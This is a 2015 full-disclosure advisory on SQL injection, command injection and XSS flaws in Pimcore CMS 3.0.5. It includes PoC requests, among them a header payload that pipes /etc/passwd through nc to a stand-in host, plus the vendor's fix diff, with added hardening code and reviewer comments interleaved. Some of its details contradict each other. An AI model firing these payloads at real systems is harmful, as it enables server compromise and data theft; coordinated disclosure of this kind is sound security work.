
List:       full-disclosure
Subject:    [FD] Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2015-05-08 13:52:12
Message-ID: 554CBF8C.40403 () vulnerability-lab ! com

Document Title:
===============
Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id82


Release Date:
=============
2015-05-08


Vulnerability Laboratory ID (VL-ID):
====================================
1482


Common Vulnerability Scoring System:
====================================
6.2


Product & Service Introduction:
===============================
Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for
creating and managing digital content and assets licensed under the open-source BSD license.
Create outstanding digital experiences on the most flexible content management platform
available. Manage and edit any type of digital content, for any device and channel in a 100%
flexible and personalized way. Pimcore features award-winning single-source and multi-channel
publishing functionality making it easy to manage, update, and integrate content and data from
various sources. With pimcore brands can create and manage rich digital experiences for all of
their output channels at once: web, mobile, apps, social platforms, print and digital signage.
With pimcore you can truly `edit once & reuse anywhere`.

(Copy of the Homepage: https://www.pimcore.org/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple vulnerabilities in the
official PIM Core v3.0.5 Content Management System.


Vulnerability Disclosure Timeline:
==================================
2015-05-01:	Researcher Notification & Coordination (Alain Homewood - PwC New Zealand)
2015-05-01:	Vendor Notification (PimCore CMS Security Team)
2015-05-05:	Vendor Response/Feedback (PimCore CMS Security Team)
2015-05-07:	Vendor Fix/Patch (PimCore Developer Team)
2015-05-08:	Public Disclosure (Vulnerability Laboratory - Alain Homewood)


Discovery Status:
=================
Published


Affected Product(s):
====================
Pimcore GmbH
Product: PimCore - Content Management System 3.0.5


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A (time-based) blind SQL injection web vulnerability has been discovered in the official
Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote
attackers or privileged user accounts to execute their own SQL commands and compromise the
affected web-server DBMS.

A blind, authenticated SQL injection vulnerability exists in the filtering functionality of the
HTTP error display in the administration panel. Authentication is required to exploit this
vulnerability; however, low privilege users may have access to this functionality (it is
located under `Marketing - Search Engine Optimisation`). The request method used to inject the
malicious SQL commands is GET, and the issue exists in the application's own code.

The security risk of the SQL injection vulnerability is estimated as high with a CVSS (Common
Vulnerability Scoring System) count of 6.2. Exploitation of the remote SQL injection web
vulnerability requires a low privilege application user account without user interaction.
Successful exploitation of the SQL injection vulnerability results in application and
web-service or DBMS compromise.

Request Method(s):
						[+] GET

Vulnerable Module(s):
						[+] ./misc/http-error-log

Vulnerable Parameter(s):
						[+] _dc


1.2
A command execution web vulnerability has been discovered in the official Pimcore v3.0.5
Content Management System (web-application). The vulnerability allows remote attackers or
low privilege user accounts to compromise the web-server by executing malicious code.

The newsletter sending functionality uses unsanitized user provided input as part of a shell
command. Authenticated users can manipulate these values to execute arbitrary commands. Note
that low privilege users are likely to have access to this functionality (e.g. marketing
users). Authentication is required to exploit this vulnerability. The request method used to
execute is POST, and the attack vector is located on the application-side of the online
service.

The security risk of the arbitrary code execution vulnerability is estimated as high with a
CVSS (Common Vulnerability Scoring System) count of 6.1. Exploitation of the arbitrary code
execution vulnerability requires no user interaction but a low privilege web-application user
account. Successful exploitation of the remote vulnerability results in unauthorized execution
of system commands.

Request Method(s):
						[+] POST

Vulnerable Module(s):
						[+] /reports/newsletter/send

Vulnerable Parameter(s):
						[+] HOST


1.3
Two reflected cross site scripting web vulnerabilities have been discovered in the official
Pimcore v3.0.5 Content Management System (web-application). The vulnerabilities allow remote
attackers to inject their own script code on the client-side into the user's (browser)
application requests.

Two reflected cross site scripting vulnerabilities exist in the administration panel. The
issues are located in the `id` parameter, which is echoed back by the `exportClassAction()` and
`exportCustomLayOutDefinitionAction()` functions of the `userClassController.php` file. The
request method used to execute is GET, and the issues are located on the client-side of the
online-service web application.

The security risk of the cross site scripting web vulnerabilities is estimated as medium with
a CVSS (Common Vulnerability Scoring System) count of 3.2. Exploitation of the cross site
scripting vulnerabilities requires no user interaction or privileged web-application user
account with password. Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing, persistent external redirects and persistent manipulation of
the function or connected module context.

Request Method(s):
						[+] GET

Vulnerable Module(s):
						[+] exportClassAction()
						[+] exportCustomLayOutDefinitionAction()

Vulnerable File(s):
						[+] userClassController.php

Vulnerable Parameter(s):
						[+] id


Proof of Concept (PoC):
=======================
1.1
The blind SQL injection web vulnerability can be exploited by remote attackers with a low
privilege application user account and low user interaction. For security demonstration or to
reproduce the vulnerability follow the provided information and steps below to continue.

GET requests to /admin/misc/http-error-log fail to sanitise the value of the "limit" parameter,
which allows users to inject SQL statements.

The unsanitized value of the parameter is included in the following SQL query in
MiscController.php:

    $logs = $db->fetchAll("SELECT code,uri,`count`,date FROM http_error_log " . $condition .
        " ORDER BY " . $sort . " " . $dir . " LIMIT " . $offset . "," . $limit);
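A hardened way to build that query, added here as an illustration rather than Pimcore's own code: LIMIT and OFFSET are forced to clamped integers, the ORDER BY column and direction come from allowlists, and the free-text filter is bound as a parameter. The PDO handle, the `uri LIKE` shape of the filter and the 500-row cap are assumptions.

```php
<?php
// Added example, not Pimcore's code: every user-controlled part of the
// http_error_log query is cast, allowlisted, or bound, so no parameter can
// alter the query's shape. Table and column names are those from the advisory;
// the PDO handle, the "uri LIKE" filter and the 500-row cap are assumptions.

const SORTABLE_COLUMNS = ['code', 'uri', 'count', 'date'];

/**
 * Builds [$sql, $bindings] for the paged error log from request parameters
 * named as in the advisory: limit, start, sort, dir, filter.
 */
function buildHttpErrorLogQuery(array $params): array
{
    // MySQL does not accept bound placeholders in LIMIT, so cast and clamp.
    // A payload such as " PROCEDURE analyse(...)" casts to 0 and is clamped to 1.
    $limit  = max(1, min(500, (int) ($params['limit'] ?? 50)));
    $offset = max(0, (int) ($params['start'] ?? 0));

    // ORDER BY column and direction only ever come from fixed allowlists.
    $sortParam = (string) ($params['sort'] ?? '');
    $sort = in_array($sortParam, SORTABLE_COLUMNS, true) ? $sortParam : 'date';
    $dir  = strtoupper((string) ($params['dir'] ?? 'DESC')) === 'ASC' ? 'ASC' : 'DESC';

    // The free-text filter is bound, never concatenated; LIKE wildcards are escaped.
    $sql      = 'SELECT code, uri, `count`, date FROM http_error_log';
    $bindings = [];
    $filter   = trim((string) ($params['filter'] ?? ''));
    if ($filter !== '') {
        $sql .= ' WHERE uri LIKE :filter';
        $bindings[':filter'] = '%' . addcslashes($filter, '%_\\') . '%';
    }
    $sql .= sprintf(' ORDER BY `%s` %s LIMIT %d, %d', $sort, $dir, $offset, $limit);

    return [$sql, $bindings];
}

// Usage with an existing PDO connection $db (assumed):
// [$sql, $bindings] = buildHttpErrorLogQuery($_GET);
// $stmt = $db->prepare($sql);
// $stmt->execute($bindings);
// $logs = $stmt->fetchAll(PDO::FETCH_ASSOC);
```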

PoC or Exploitcode:
This vulnerability can be exploited with a time based technique as described on:
https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

--- PoC Session Logs [GET] ---
	GET /admin/misc/http-error-log?_dc30255599566&limit \
%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,BENCHMARK(5000000,SHA1(1)),1))))),1)&filter= HTTP/1.1
	Host: [VULNERABLE]
	Accept: */*
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
	X-Requested-With: XMLHttpRequest
	Referer: http://[VULNERABLE]/admin/?_dc30255468
	Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
	Connection: keep-alive

Reference(s):
admin/misc/http-error-log?_dc

1.2
The code execution web vulnerability can be exploited by remote attackers without a privileged
application user account or user interaction. For security demonstration or to reproduce the
vulnerability follow the provided information and steps below to continue.

The user's hostname is retrieved through $_SERVER['HTTP_X_FORWARDED_HOST'] or
$_SERVER['HTTP_HOST'] and then included in a command that is executed
(NewsletterController.php).
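An added example (not Pimcore's code) of the two defences a reviewer would want for this path: honouring X-Forwarded-Host only when it was set by a configured trusted proxy and validating the host syntax, then quoting each command argument with escapeshellarg(). The trusted-proxy list, the script path and the request array are constructed for the example.

```php
<?php
// Added example, not Pimcore's code: resolve the host URL without trusting
// a client-supplied X-Forwarded-Host, then quote every CLI argument.
// The trusted-proxy list, script path and request array are constructed.

function resolveHostUrl(array $server, array $trustedProxies): string
{
    $host = (string) ($server['HTTP_HOST'] ?? '');
    // X-Forwarded-Host is attacker-controlled unless a trusted reverse proxy set it.
    if (isset($server['HTTP_X_FORWARDED_HOST'])
        && in_array($server['REMOTE_ADDR'] ?? '', $trustedProxies, true)) {
        $host = (string) $server['HTTP_X_FORWARDED_HOST'];
    }
    // Hostname with optional port only (IPv6 literals not covered here); anything
    // containing spaces or shell metacharacters such as '&', '|' or ';' is refused.
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}(:[0-9]{1,5})?$/', $host)) {
        throw new InvalidArgumentException('Refusing to use malformed Host header');
    }
    $https = !empty($server['HTTPS']) && $server['HTTPS'] !== 'off';
    return ($https ? 'https' : 'http') . '://' . $host;
}

function buildSendNewsletterCommand(string $phpCli, string $script, string $name, string $hostUrl): string
{
    // Each value becomes one single-quoted token, so the shell never parses it.
    return escapeshellarg($phpCli) . ' ' . escapeshellarg($script) . ' '
         . escapeshellarg($name) . ' ' . escapeshellarg($hostUrl);
}

// Constructed request mirroring the advisory's PoC header. The forwarded host is
// ignored because 203.0.113.5 is not a trusted proxy; had it been, the regex would
// still reject the value, and escapeshellarg() would quote it in any case.
$server = [
    'HTTP_HOST'             => 'cms.example.test',
    'HTTP_X_FORWARDED_HOST' => ' && cat /etc/passwd | nc hacker 1234',
    'REMOTE_ADDR'           => '203.0.113.5',
];
$hostUrl = resolveHostUrl($server, ['10.0.0.1']);
echo buildSendNewsletterCommand(
    '/usr/bin/php', '/var/www/pimcore/cli/send-newsletter.php', 'weekly', $hostUrl
), PHP_EOL;
```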

PoC: The command to be executed can be inserted into an X-forwarded-host HTTP header, for
example:
--- PoC Session Logs [POST] ---
	POST /admin/reports/newsletter/send HTTP/1.1
	Host: 1[VULNERABLE]
	Accept: */*
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
	X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
	X-Requested-With: XMLHttpRequest
	Referer: http://[VULNERABLE]/admin/?_dc30259866451
	Content-Length: 20
	Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
	Connection: keep-alive
	Pragma: no-cache
	Cache-Control: no-cache
	X-forwarded-host:  && cat /etc/passwd | nc hacker 1234

Reference(s):
/admin/reports/newsletter/send


1.3
The cross site scripting web vulnerabilities can be exploited by remote attackers with a low
privilege application user account and low user interaction. For security demonstration or to
reproduce the vulnerability follow the provided information and steps below to continue.

Unsanitized user provided input in the "id" parameter is echoed back to the user in the
exportClassAction() and exportCustomLayOutDefinitionAction() functions in
userClassController.php.

Only authenticated users with permission to access the class export functionality are
vulnerable to this (i.e. administrators).

PoC:
http://[VULNERABLE]/admin/class/export-class?id=<script>alert(1)</script>
http://[VULNERABLE]/admin/class/export-custom-layout-definition?id=<script>alert(1)</script>


Solution - Fix & Patch:
=======================
URL(s):
https://github.com/pimcore/pimcore/commit/a01a4c87a782a7b20ccc4081c9340698f2d52573

pimcore/modules/admin/controllers/ClassController.php
@@ -484,10 +484,12 @@ public function getAllLayoutsAction() {
     public function exportClassAction() {

         $this->removeViewRenderer();
-        $class = Object ClassDefinition::getById(intval($this->getParam(``id``)));
+
+        $id = intval($this->getParam(``id``));
+        $class = Object ClassDefinition::getById($id);

         if (!$class instanceof Object ClassDefinition) {
-            $errorMessage = ``: Class with id [ `` . $this->getParam(``id``) . `` not found. \
]``; +            $errorMessage = ``: Class with id [ `` . $id . `` not found. ]``;
              Logger::error($errorMessage);
             echo $errorMessage;
         } else {
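Review bot: The cast `$id = intval($this->getParam(``id``));` together with the switch to `. $id .` in the error message is what closes the reflected XSS, since only an integer can now reach `echo $errorMessage;`. That line still writes an unencoded string straight to the response, so wrapping it in htmlspecialchars() (or sending a non-HTML Content-Type before the echo) would keep the action safe if the message is later extended with non-numeric data. Note also that in this copy of the diff the `+` error-message line has been run onto the end of the preceding `-` line.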
@@ -496,14 +498,13 @@ public function exportClassAction() {
             header(``Content-Disposition: attachment; filename= ``class_`` . $class->getName() \
. ``_export.json ````);  echo $json;
         }
-
     }


     public function exportCustomLayoutDefinitionAction() {

         $this->removeViewRenderer();
-        $id = $this->getParam(``id``);
+        $id = intval($this->getParam(``id``));

         if ($id) {
             $customLayout = Object ClassDefinition CustomLayout::getById($id);
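Review bot: `$id = intval($this->getParam(``id``));` is consistent with the first hunk, and because non-numeric input becomes 0 the `if ($id)` guard on the context line now skips the lookup entirely, so no attacker-controlled string reaches the later output. The Content-Disposition filename built from `$class->getName()` on the context line above is not touched by this patch; it is worth confirming separately that class names are restricted to characters safe in a header value.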

pimcore/modules/reports/controllers/NewsletterController.php
@@ -185,7 +185,7 @@ public function sendAction() {

         $letter = Newsletter Config::getByName($this->getParam(``name``));
         if($letter) {
-            $cmd = Tool Console::getPhpCli() . `` `` . realpath(PIMCORE_PATH . \
DIRECTORY_SEPARATOR . ``cli`` . DIRECTORY_SEPARATOR . ``send-newsletter.php``). `` `` . \
$letter->getName() . `` `` . Tool::getHostUrl(); +            $cmd = Tool Console::getPhpCli() \
. `` `` . realpath(PIMCORE_PATH . DIRECTORY_SEPARATOR . ``cli`` . DIRECTORY_SEPARATOR . \
``send-newsletter.php``). `` `` . escapeshellarg($letter->getName()) . `` `` . \
                escapeshellarg(Tool::getHostUrl());
             Tool Console::execInBackground($cmd, PIMCORE_LOG_DIRECTORY . ``/newsletter--`` . \
$letter->getName() . ``.log``);  }
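Review bot: Wrapping both `$letter->getName()` and `Tool::getHostUrl()` in escapeshellarg() closes the injection from section 1.2, but the host is still taken from a client-controlled header; deriving it from configuration, or honouring X-Forwarded-Host only when a trusted proxy set it, would keep the attacker-chosen value out of the command altogether, with escapeshellarg() remaining as the second layer. The log path on the unchanged context line, `PIMCORE_LOG_DIRECTORY . ``/newsletter--`` . $letter->getName() . ``.log``, still embeds the raw newsletter name, so check that names cannot contain path separators.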



pimcore/modules/admin/controllers/MiscController.php
@@ -325,8 +325,8 @@ public function httpErrorLogAction() {

         $db = Resource::get();

-        $limit = $this->getParam(``limit``);
-        $offset = $this->getParam(``start``);
+        $limit = intval($this->getParam(``limit``));
+        $offset = intval($this->getParam(``start``));
         $sort = $this->getParam(``sort``);
         $dir = $this->getParam(``dir``);
         $filter = $this->getParam(``filter``);
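Review bot: intval() on `limit` and `start` fixes the LIMIT-clause injection from section 1.1, but `$sort`, `$dir` and `$filter` on the following context lines are still read raw, and the query quoted in the PoC section concatenates `$sort` and `$dir` directly into ORDER BY. Validate `$sort` against an allowlist of the selected column names and `$dir` against ASC/DESC, and confirm that `$filter` reaches `$condition` only through bound parameters; otherwise the same endpoint stays injectable through a different parameter.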


Security Risk:
==============
1.1
The security risk of the blind SQL injection web vulnerability in the Pimcore CMS is estimated
as high. (CVSS 6.2)

1.2
The security risk of the code execution web vulnerability in the Pimcore CMS is estimated as
high. (CVSS 6.1)

1.3
The security risk of the reflected cross site scripting web vulnerabilities in the Pimcore CMS
is estimated as medium. (CVSS 3.2)


Credits & Authors:
==================
Alain Homewood - PwC New Zealand (http://www.pwc.co.nz/services/assurance-services/pwc-security/)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its
suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if Vulnerability-Lab or its
suppliers have been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability Laboratory. Permission to electronically redistribute this
alert in its unmodified form is granted. All other rights, including the use of other media,
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is trademark of
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to
get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

